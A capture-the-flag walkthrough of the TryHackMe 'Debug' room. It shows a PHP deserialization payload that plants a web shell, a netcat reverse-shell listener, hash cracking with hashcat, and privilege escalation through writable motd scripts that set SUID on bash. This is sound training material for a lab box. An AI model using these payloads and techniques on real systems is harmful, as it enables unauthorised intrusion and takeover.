Debug TryHackMe Writeup

8 minute read

debug

Debug is a medium rated linux room on tryhackme by ustoun0. Unsanitized user input was passed to unserialize function which was used to get a shell on the box as www-data. On the box, a hash on .htpasswd file was found and cracked and the password was reused by user james as his account’s password. User james can change the file of motd, which was used to get a root shell on the box.

Port Scan

Full Port Scan

[email protected]:~/Documents/tryhackme/debug$ nmap -v -oN nmap/all-ports -p- --min-rate 10000 10.10.143.185
Nmap scan report for 10.10.143.185
Host is up (0.38s latency).
Not shown: 63305 closed ports, 2228 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Mar 31 18:51:25 2021 -- 1 IP address (1 host up) scanned in 29.35 seconds

Detail Scan

[email protected]:~/Documents/tryhackme/debug$ sudo nmap -p 22,80 -sC -sV -oN nmap/detail 10.10.143.185
[sudo] password for reddevil:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-31 18:53 +0545
Nmap scan report for 10.10.143.185
Host is up (0.50s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
|   256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_  256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.12 seconds

We have just two ports open. One being SSH on port 22 which says it is running ubuntu and another is HTTP which is running on port 80. So, lets check port 80.

Enumerating HTTP service on port 80

1 We just get a default page for apache.

Directory and file bruteforcing using ffuf

[email protected]:~/Documents/tryhackme/debug$ ffuf -u http://10.10.143.185/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt
,.php,.html -fc 404 -o ffuf-root.log

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.143.185/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .txt .php .html
 :: Output file      : ffuf-root.log
 :: File format      : json
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response status: 404
________________________________________________

index.php               [Status: 200, Size: 5730, Words: 1428, Lines: 204]
index.html              [Status: 200, Size: 11321, Words: 3503, Lines: 376]
javascript              [Status: 301, Size: 319, Words: 20, Lines: 10]
message.txt             [Status: 200, Size: 141, Words: 37, Lines: 4]
backup                  [Status: 301, Size: 315, Words: 20, Lines: 10]
grid                    [Status: 301, Size: 313, Words: 20, Lines: 10]

Few entries are obtained from ffuf.

Checking /index.php

2 We get a page back which has standard lorem ipsum stuff.

/backup seems interesting.

Checking /backup

3 Directory listing is enables and among the files listed index.php.bak looks interesting.

Downloading index.php.bak

[email protected]:~/Documents/tryhackme/debug/backup$ wget http://10.10.143.185/backup/index.php.bak

Interesting content in index.php.bak

<?php

class FormSubmit {

public $form_file = 'message.txt';
public $message = '';

public function SaveMessage() {

$NameArea = $_GET['name']; 
$EmailArea = $_GET['email'];
$TextArea = $_GET['comments'];

        $this-> message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";

}

public function __destruct() {

file_put_contents(__DIR__ . '/' . $this->form_file,$this->message,FILE_APPEND);
echo 'Your submission has been successfully saved!';

}

}

// Leaving this for now... only for debug purposes... do not touch!

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application -> SaveMessage();


?>

Looking at the code, unsanitized input on debug parameter is directly sent to unserialize function. This can lead to code execution if we can control the values passed to the magic functions.

Magic methods on PHP

__wakeup()
__destruct()
__toString()
__call()

Ippsec has done a great job of explaining deserialization on PHP in this video. So, I suggest you to watch this video once.

__destruct() method is present on the code above and looks like we can create a file on the home directory of the webserver and also control the name of the file and content of the file.

Creating a PHP serialized object to get code execution

Content of test.php

<?php
class FormSubmit{
        public $form_file = 'test.php';
        public $message = '<?php system($_GET["cmd"]); ?>';
}
$obj = new FormSubmit();
echo serialize($obj);
?>

Generating a serialized payload

[email protected]:~/Documents/tryhackme/debug$ php test.php 
O:10:"FormSubmit":2:{s:9:"form_file";s:8:"test.php";s:7:"message";s:30:"<?php system($_GET["cmd"]); ?>";}

Making a request

4

Checking if the page exists

[email protected]:~/Documents/tryhackme/debug$ curl http://10.10.201.86/test.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We get code execution on the box.

Reverse shell on the box

[email protected]:~/Documents/tryhackme/debug$ nc -nvlp 9001                 
Listening on 0.0.0.0 9001                                                  
Connection received on 10.10.143.185 55780                                 
/bin/sh: 0: can't access tty; job control turned off
$

Getting a proper TTY

Now lets get a proper shell with auto completion.

$ python -c "import pty;pty.spawn('/bin/bash')"

Hit CRTL+z to background the current process and on local box type

[email protected]:~/Documents/tryhackme/debug$ stty raw -echo

and type fg and hit enter twice and on the reverse shell export the TERM as xterm.

[email protected]:/var/www/html$ export TERM=xterm

Now we have a proper shell. We are running as www-data user

Privilege Escalation

On the home directory of the webserver .htpasswd file was found containing username and hash.

[email protected]:/var/www/html$ ls -la                                                                                                                
total 72                                                                                                                                              
drwxr-xr-x 6 www-data www-data  4096 Mar 31 09:32 .                                                                                                   
drwxr-xr-x 3 root     root      4096 Mar  9 19:56 ..                                                                                                  
-rw-r--r-- 1 www-data www-data    44 Mar  9 20:09 .htpasswd                                                                                           
drwxr-xr-x 5 www-data www-data  4096 Mar  9 20:10 backup                                                                                              
drwxr-xr-x 2 www-data www-data  4096 Mar  9 20:10 grid                                                                                                
-rw-r--r-- 1 www-data www-data 11321 Mar  9 20:10 index.html               
-rw-r--r-- 1 www-data www-data  6399 Mar  9 20:10 index.php                
drwxr-xr-x 2 www-data www-data  4096 Mar  9 20:10 javascripts              
drwxr-xr-x 2 www-data www-data  4096 Mar  9 20:10 less                                                                                                
-rw-r--r-- 1 www-data www-data   435 Mar 31 09:34 message.txt              
-rw-r--r-- 1 www-data www-data  2339 Mar  9 20:10 readme.md                
-rw-r--r-- 1 www-data www-data 10371 Mar  9 20:10 style.css                
-rw-r--r-- 1 www-data www-data    76 Mar 31 09:34 test.php 

Content of .htaccess

[email protected]:/var/www/html$ cat .htpasswd                              
james:$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1 

Cracking the hash using hashcat

[email protected]:~/Documents/tryhackme/debug$ hashcat -m 1600 hash /usr/share/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...                                               
.........[snip]..........

$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1:<james-redacted-password>

.............[snip]......

Listing users on the box

[email protected]:/var/www/html$ cat /etc/passwd | grep -i 'sh$'            
root:x:0:0:root:/root:/bin/bash                                            
james:x:1001:1001::/home/james:/bin/bash  

james is a user on the box with login shell as bash.

Checking if user james has reused the password

[email protected]:/var/www/html$ su james                                                                                                              
Password:                                                                                                                                             
[email protected]:/var/www/html$ id                                            
uid=1001(james) gid=1001(james) groups=1001(james) 

And we have a shell as user james.

Reading user flag

[email protected]:/etc/update-motd.d$ cat ~/user.txt                                                                                                      
7e37c84****************8d28c20

Enumeration

On the home directory of james, a note was found.

[email protected]:~$ ls -la                                                                                                                               
total 116                                                                                                                                             
drwx------ 17 james james 4096 Mar 10 18:37 .                                                                                                         
drwxr-xr-x  4 root  root  4096 Mar 10 18:26 ..                                                                                                        
-rw-------  1 james james  460 Mar 10 18:38 .bash_history                                                                                             
-rw-r--r--  1 james james  220 Aug 31  2015 .bash_logout                                                                                              
-rw-r--r--  1 james james 3771 Aug 31  2015 .bashrc                                                                                                   
drwx------ 11 james james 4096 Mar 10 18:25 .cache                                                                                                    
drwx------ 14 james james 4096 Mar 10 18:26 .config                                                                                                   
drwxr-xr-x  2 james james 4096 Mar 10 18:24 Desktop                                                                                                   
drwxr-xr-x  2 james james 4096 Mar 10 18:24 Documents                                                                                                 
drwxr-xr-x  2 james james 4096 Mar 10 18:24 Downloads                                                                                                 
-rw-r--r--  1 james james 8980 Apr 20  2016 examples.desktop               
drwx------  2 james james 4096 Mar 10 18:25 .gconf                         
drwx------  3 james james 4096 Mar 10 18:25 .gnupg                         
-rw-------  1 james james  322 Mar 10 18:25 .ICEauthority                  
drwx------  3 james james 4096 Mar 10 18:24 .local                         
drwxr-xr-x  2 james james 4096 Mar 10 18:24 Music                          
drwxrwxr-x  2 james james 4096 Mar 10 18:32 .nano                          
-rw-r--r--  1 james james  477 Mar  9 20:59 Note-To-James.txt                                                                                         
drwxr-xr-x  2 james james 4096 Mar 10 18:24 Pictures                                                                                                  
-rw-r--r--  1 james james  655 May 16  2017 .profile                       
drwxr-xr-x  2 james james 4096 Mar 10 18:24 Public                                                                                                    
drwx------  2 james james 4096 Mar 10 18:32 .ssh                                                                                                      
drwxr-xr-x  2 james james 4096 Mar 10 18:24 Templates                      
-rw-r--r--  1 james james   33 Mar  9 20:57 user.txt                       
drwxr-xr-x  2 james james 4096 Mar 10 18:24 Videos                   
-rw-------  1 james james   52 Mar 10 18:24 .Xauthority                    
-rw-------  1 james james   82 Mar 10 18:24 .xsession-errors

Content of Note-To-James.txt

[email protected]:~$ cat Note-To-James.txt                         
Dear James,                                                                
                                                                                                                                                      
As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it? 
                                                                           
But there's still one thing I'd like you to do, before the submission.
                                     
Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D                                                 

I gave you access to modify all these files :) 

Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!

Best Regards,

root

It talks about the message that is shown when we login on the box using SSH ie motd(message of the day).

Listing the config file

[email protected]:~$ find /etc 2>/dev/null | grep -i motd
/etc/update-motd.d
/etc/update-motd.d/10-help-text
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/98-fsck-at-reboot
/etc/update-motd.d/98-reboot-required
/etc/update-motd.d/00-header
/etc/update-motd.d/00-header.save
/etc/update-motd.d/99-esm
/etc/update-motd.d/90-updates-available

Checking the file permissions

[email protected]:/etc/update-motd.d$ ls -la
total 44
drwxr-xr-x   2 root root   4096 Mar 10 18:38 .
drwxr-xr-x 134 root root  12288 Mar 10 20:08 ..
-rwxrwxr-x   1 root james  1220 Mar 10 18:32 00-header
-rwxrwxr-x   1 root james     0 Mar 10 18:38 00-header.save
-rwxrwxr-x   1 root james  1157 Jun 14  2016 10-help-text
-rwxrwxr-x   1 root james    97 Dec  7  2018 90-updates-available
-rwxrwxr-x   1 root james   299 Jul 22  2016 91-release-upgrade
-rwxrwxr-x   1 root james   142 Dec  7  2018 98-fsck-at-reboot
-rwxrwxr-x   1 root james   144 Dec  7  2018 98-reboot-required
-rwxrwxr-x   1 root james   604 Nov  5  2017 99-esm

User james can write to these files. And since these files are executed when the user logs on the system using SSH, we can get code execution.

Changing the content of 00-header file

6

SETUID bit will be set on the /bin/bash binary when we login as user james using SSH.

Logging on the box using SSH

[email protected]:~/Documents/tryhackme/debug$ ssh [email protected]                                                                             
The authenticity of host '10.10.143.185 (10.10.143.185)' can't be established.
ECDSA key fingerprint is SHA256:JCUiGJ9gC+EZEJeudS9yMKLVlE7MtpS2rolJudHcCbQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.143.185' (ECDSA) to the list of known hosts.
[email protected]'s password:                                            
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
                                                                           
439 packages can be updated.
380 updates are security updates.                                          
                                     
Last login: Wed Mar 10 18:36:58 2021 from 10.250.0.44
-bash-4.3$ id                                                              
uid=1001(james) gid=1001(james) groups=1001(james)

Getting a root shell

-bash-4.3$ /bin/bash -p
bash-4.3# id
uid=1001(james) gid=1001(james) euid=0(root) groups=1001(james)

We get a root shell.

Reading root flag

bash-4.3# cat /root/root.txt                                                     
3c8c****************abf4b